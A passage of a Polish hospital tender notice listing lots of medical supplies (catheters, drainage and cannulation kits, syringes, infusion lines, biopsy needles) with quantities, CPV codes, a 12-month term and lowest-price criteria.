3. Cewnik moczowodowy - podwójny PIGTAIL - sterylny w rozmiarach 6F/28, 6F/30  szt.20
4. Cewnik moczowodowy - podwójny PIGTAIL - sterylny w rozmiarach 5F/28	szt.10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 2 
Cewnik moczowodowy typ Nelaton - długość 70 cm, podziałka min. co 1 cm, widoczny w RTG, wyposażony w plastikowy mandryn
1. Cewnik moczowodowy - NELATON - sterylny  rozmiar 4F   szt.	100
2. Cewnik moczowodowy - NELATON - sterylny  rozmiar 5F   szt.	150
3. Cewnik moczowodowy - NELATON - sterylny  rozmiar 6F   szt.	20
4. Cewnik moczowodowy - NELATON - sterylny  rozmiar 7F   szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR  3
Cewnik do  embolektomii z balonem  - koniec dystalny ślepo zakończony, zaopatrzony w kontrast RTG, posiadający balonik lateksowy. Koniec proksymalny zakończony końcówką uniwersalną, kod długości  co 1 cm, oznaczenia barwne rozmiarów. Pakowany indywidualnie folia - papier.
1. Cewnik   -    sterylny               CH 4/ 80	szt.	40
2. Cewnik - sterylny  CH 5/80	             szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4		
Cewnik typ Dufour przezroczysty trójdrożny do tamponady po zabiegach TUR wykonany z medycznego PCV, balon 75 ml, z nitką RTG	
1. j.w. CH 18	szt.	30
2. j.w. CH 20	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5Cewnik urologiczny TYP TIEMANN - przeznaczenie: do cewnikowania pęch. Moczowego przy przeoście gruczołu krokowego, sterylny EO, wykonany w całości z PCW, opakowanie: folia - papier, 2 otwory boczne, atraumatyczny zamknięty koniec, kod barwny oznaczający rozmiar	
1. j.w. CH 8	szt.	10
2. j.w. CH 10	szt.	50
3. j.w. CH 12	szt.	180
4. j.w. CH 14	szt.	160
5. j.w. CH 16	szt.	120
6. j.w. CH 18	szt.	30
7. j.w. CH 20	szt.	80
8. j.w. CH 22	szt.	50
9. j.w. CH 24	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6 Cewnik dopęcherzowy pooperacyjny z balonem - końcówka typu DUFOUR - cewnik trójdrożny, wzmocniony, silikonowany , cztery otwory odprowadzające powyżej balonu, cewnik steryklny, opakowanie: folia - papier (2warstwy), pojemność balona i rozmiar wg wskazania, dwustronne zbrojenie zapewniające drożność w trakcie płukania, koncówka zakrzywiona z dodatkowym dużym otworem	
1. j.w. CH 18 poj. Balona 30/50	szt.	10
2. j.w. CH 18 poj. Balona 60/80	szt.	5
3. j.w. CH 20 poj. Balona 30/50	szt.	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 7 Cewnik dopęcherzowy pooperacyjny z balonem - końcówka tyopu DUFOUR - cewnik dwudrożny, wzmocniony, silikonowany, trzy otwory odprowadzające, sterylny, opakowanie: folia - papier (2 warstwy), pojemność balona i rozmiar wg wskazania, dwustronne zbrojenie zapewniające drożność w trakcie płukania, końcówka zakrzywiona z dodatkowym dużym otworem	
1. j.w. CH 18 poj. Balona 30/50	szt.	15
2. j.w. CH 18 poj. Balona 60/80	szt.	5
3. j.w. CH 20 poj. Balona 30/50	szt.	15
4. j.w. CH 20 poj. Balona 60/80	szt.	25
5. j.w. CH 22 poj. Balona 30/50	szt.	10
6. j.w. CH 22 poj. Balona 60/80	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 8 Cewnik do karmienia - typ i rozmiar zgodnie z opisem, pakowane w długości, proste - nie zwijane, z konektorem półprzezroczytym, zmrożona powierzchnia zewnętrzna, wykonane z PCW o jakościo medycznej i twardości pow. 76o - 80o ShA,  CH 5, bez ftalanów	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 9 Cewnik do karmienia - minimalne wymagania jakościowe, typ i ropzmiar zgodnie z opisem, pakowane w długości, proste - nie zwijane 
1. cewnik do karmienia - sterylny CH 5	szt. 	6 000
2. cewnik do karmienia - sterylny CH 6		
3. cewnik do karmienia - sterylny CH 8		
4. cewnik do karmienia - sterylny CH 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 10 Cewnik urologiczny Typ Couvelaire - przeznaczenie do krótkotrwałego cewnikowania pęch. Moczowego poprzez wprowadzenie przez cewkę - sterylny, wykonany  w całości z PCW, opakowanie: folia  - papier, 2 otowry boczne, kod barwny oznaczający rozmiar	
1. j.w. CH 10	szt. 	100
2. j.w. CH 12	szt. 	70
3. j.w. CH 14	szt. 	120
4. j.w. CH 16	szt. 	160
5. j.w. CH 18	szt. 	100
6. j.w. CH 20	szt. 	50
7. j.w. CH 22	szt. 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAW NR 11 Cewniki do odsysania dróg oddechowych -  z PCV zmrożony, sterylny, jendorazowego użytku. Z jednym otworem centralnym i dwoma bocznymi (o łącznej powierzchni mniejszej niż centralny otwór) zapobiegające zasysaniu błony śluzowej. Opakowanie folia - papier; kod barwny oznaczający rozmiar.
1. cewnik  CH4	szt.	100
2. j.w. CH 6	szt.	3 150
3. j.w.  CH 8	szt.	1 450
4. j.w.  CH 10	szt.	1 650
5. j.w.  CH 12	szt.	1 200
6. j.w.  CH 14	szt.	11 100
7. j.w.  CH 16	szt.	9 100
8. j.w. CH 18	szt.	1 500
9. j.w. kolor kodu  CH 20	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 12 Cewnik do podania tlenu - czyty mikrobiologicznie lub sterylny, typu okularowy, opakowanie: folia - papier. Z PCV, dł. 150cm, pozwala na podaż tlenu w odpowiednim stężeniu bez podrażnień i wysuszenia błon śluzowych, łagodne zakończenie rurek nosowych nie uszkadzające błony śluzowej   szt.	4 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 13 wąż do ssaka - sterylny, opakowanie: folia- papier 9,0 x 5,0 x 1500 mm, z elastycznym konektorem przyłaczeniowym, jedno zakończenie kompatybilne z cewnikami do odsysania (bez konieczności stosowania łączników)	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Zestaw do kaniulacji dużych naczyń - typ i   rozmiar zgodnie z  opisem: cewnik  z poliuretanu  z powłoką hydroforową ,   widoczny w RTG, igła do nakłucia  naczynia   18G/ 80 mm, prowadnik   z zakończeniem typu  J, rozszerzacz, skalpel, strzykawka, dodatkowe skrzydełka z zaciskiem do stabilizacji cewnika.
1. Zestaw do kaniulacjii  dużych naczyń     dwukanałowy - sterylny  7 F x 20 cm szt. 5
2. Zestaw do kaniulacji dużych naczyń  dwukanałowy - sterylny  7 F x 15 cm szt. 200
3. Zestaw do kaniulacji dużych naczyń trzykanałowy - sterylny  7 F x 15 cm	szt.5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR   2
Zestaw do nefrostomii wielostopniowej zawiera: cewnik z jednodrożnym kranikiem, dwuczęściową igłę punkcyjną, prowadnik Lunderquista 80cm,  rozszerzadło, łącznik bezlateksowy do podłączenia worka na mocz z mechanizmem obrotowym
1. Zestaw do nefrostomii p/ skórnej  - sterylny 9F 	kpl.	15
2. Zestaw do nefrostomi  p/ skórnej - sterylny  10F, 12F 	kpl.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 3
Zestaw do szynowania moczowodów -  cewnik typu  Pigtail, z poliuretanu, z podziałką długości min. co 1 cm, prowadnik, sztywny popychacz z ruchomym elementem wewnętrznym umożliwiającym cofanie i obracanie podczas zakładania,  zaciski z silikonową szpulką do mocowania cewnika - rozmiar zgodnie z opisem
1. Zestaw do szynowania moczowodów - sterylny 6 F/ 28, 5F/28   kpl.	10
2. Zestaw do szynowania moczowodów - sterylny 7 F/ 26, 5F/26   kpl.	10
3. Zestaw do szynowania moczowodów - sterylny 7 F/ 28	kpl.	10
4. Zestaw do szynowania moczowodów - sterylny 7F/30, 8F/30 kpl.	5
5. Zestaw do sterowanego szynowania moczowodów - sterylny typ Double - J do ESWL  - cewnik o wewnętrznym i zewnętrznym drenażu, specjalnie profilowany do szybkiego drenażu złogów, przeznaczony do długotrwałego drenażu - do 6 miesięcy - widoczny w promieniach RTG, otwory drenujące na pętlach i trzonie, oznaczenie ułatwiające odpowiednie umiejscowienie cewnika, atraumatyczna pętla pęcher	w rozmiarach 7F/28, 7F/26	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 Zestaw do punkcji jam ciała - drenaż p/skórny metodą jednostopniową - sterylizowany EO, wyrób jednorazowego użytku, apirogenny, nietoksyczny. Skład: kateter typu PIGTAIL igła dwuczęściowa 15G x 29 cm, tokar; kołnierz mocujący; opaska zaciskowa kateter PIGTAIL 9F/26cm	szt.	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 Zestaw do 24h toalety jamy ustnej zawierający: cewnik typu yankauer z osłoną i uchwyt ssący z regulacją siły ssania, cewnik do odysysania z górnej części gardła, łacznik Y do układu ssącego, 2 szczoteczki do zębów z odysyaniem i gąbką na górnej powierzchni pokrytą dwuwęglanem sodu, gąbkę z odysysaniem i zagiętą końcówką pokryta dwuwęglanem sodu, 3 jednorazowe opakowania bezalkoholowego płynu do płukania jamy ustnej z 0,05% roztworem chlorku Cetylopirydyny, 3 gąbki - aplikatory oraz 3 jednorazowe opakowania preparatu nawilżajacego do ust na bazie wodnej	opak.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 6 Zaciskacz pępowiny
zaciskacz pępowiny - sterylny, pakowany indywidualnie folia - papier, ząbkowane ramiona stabilizujące zaciskacz na pępowinie, zatrzask zabezpiecza przed przypadkowym otwarciem	szt.	1 070
kanki do odbytu i zestaw do lewatywy	
kanka do odbytu - sterylna, opakowanie indywidualne blistrowe, wykonana z PCW, dwa duże otowry boczne, kod barwny oznaczający rozmiar, rozmiary wg wskazania CH 16 x 200mm	szt.	320
j.w. CH 30 x 400mm	szt.	1 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 7 zestaw do lewatywy - opakowanie indywidualne blistrowe, pojemność worka ze wzmocnionej folii 1750 ml z uchytem do zawieszania, możliwość kontroli objętości płynu do wlewu z dokładnością do 250 ml, dren z klamrą, zakończony plastyczną kanką; mikrobiologicznie czysty.	szt.	4 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Kaniula dotętnicza	
kaniula dotętnicza z zaworem odcinający. Kaniula musi być wyposażona w zawór kulowy odcinający oraz posiadać skrzydełka do umocowania rozmiar 20G długość 45mm	szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Kateter do odsysania pola operacyjnego - sterylny z końcówką do zabiegów ortopedycznych dren długości 270-300 cm; dwa filtry, 3 wymienne końcówki pakowany w wewnętrzny worek foliowy oraz zewnętrzne opakowanie folia - papier	szt.	50
Kateter do odsysania pola operacyjnego - sterylny; z końcówką, dren długości min.  300 cm. Uniwersalna lejkowata końcówka, umożliwiająca bezpieczny uchwyt. W miejscu uchwytu spłaszczona niegładka powierzchnia, końcówka z otworem służącym kontroli odsysania, koniec zaokrąglony; dren odporny na załamanie i skręcenie zakończony konektorem o obudowie schodkowej, co umożliwia łączenie z różnymi drenami ssaka. Pakowany w wewnętrzny worek foliowy oraz zewnętrzne opakowanie folia - papier	szt.	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 Kateter do okluzji i ekstrakcji z balonem o pojemności  1,5 ml jałowy, po napełnieniu powietrzem, jednorazowego użytku, długość 200 cm, rozmiar 7F szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 szczoteczka do czyszczenia endoskopu niejałowa, wielorazowa - kanał powietrze - woda, do duodendoskopu ED-530XT8 sympol FT WB 2221EW2 (będącego na wyposażeniu szpitala)	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Pakiet VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Dren do ran chirurgicznych dachówkowy 2,5/25 mm	szt.	40
Dren tkankowy 18 - rurkowy 250 mm x 50 mm	szt.	20
Łącznik do drenów prosty	szt.	2 000
Łącznik do drenów Y średnica każdego ramienia 7 mm	szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Pakiet VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 Zestaw drenów płuczących z dwiema igłami przekłuwającymi, kompatybilny z aparatem Karl Storz znajdującym się na wyposażeniu szpitala (histeroskopia)	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Pakiet VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 Dren miękki z ostrymtokarem, na drenie dwa otowy położone niesymetrycznie, dren skalowany co 2 cm w rozm.:	
1. opis j.w. : 20F x 390mm	szt.	5
2. j.w. 24F x 390 mm	szt.	30
3. 28F x 390mm	szt.	20
4. 32F x 390mm	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Strzykawka LUER   jednorazowego użytku do insuliny 1 ml -  trzyczęściowa, z igłą, tłoczek gumowy; centrycznie umieszczony stożek LUER o zbieżności  6 : 100; działka elementarna 0,05 ml, kryza ograniczająca wysuwanie się tłoka; czytelna i niezmywalna skala; dołączona igła iniekcyjna o grubości    0,45 x 10 mm; 0,29 x 13mm; opakowanie jednostkowe  typu  blister - pack szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 Strzykawka LUER  jednorazowego użytku do tuberkuliny 1 ml  - trzyczęściowa, z igłą; tłoczek gumowy; centrycznie umieszczony stożek LUER o zbieżności 6:100; działka elementarna  0,05 ml; kryza ograniczająca wysuwanie się tłoka; czytelna i niezmywalna skala; dołączona igła iniekcyjna o grubości   0,45 x 13 mm; 0,45 x 10 mm; opakowanie jednostkowe typu blister - pack.
szt.	2 900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 Strzykawka do pomp infuzyjnych. Sterylna. Opakowanie: folia - papier. Czytelne oznakowanie skali na strzykawce. Szeroki gumowy tłok zapewniający łągodny przesuw; przeznaczona do iniekcji leków światłoczułych. Bursztynowa 50ml; kompatybilna z pompa będącą na wyposażeniu szpitala szt.     1 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 Strzykawka do pomp infuzyjnych. Sterylna. Opakowanie: folia - papier. Czytelne oznakowanie skali na strzykawce. Przezroczysta. Szeroki gumowy tłok (zapewniający łagadny przesuw) 50ml; kompatybilna z popmą będącą na wyposażeniu szpitala.	szt.	15 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 Przedłużacz do pomp infuzyjnych - sterylny. Nie wymagający dociskania, aby zapewnić szczelność. Do pomp infuzyjnych strzykawkowych. Dren wykonany z materiału, który nie pęknie przy dokręcaniu (nie przecieka; nie zasysa powietrza), długość 1,5m. Zakończony łącznikiem Luer - Lock. Przezroczysty	szt.
11 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Pakiet VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6 Przedłużacz do pomp infuzyjnych - czarny 150 cm, opis j.w.	szt.
1 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Pakiet IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 Igły cytologiczne (biopsyjne) do bac w czasie bronchoskopii. Długość robocza: 1200mm; średnica igły 22G/0,7mm; długość igły - 13mm	szt.70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Pakiet IX.</p>
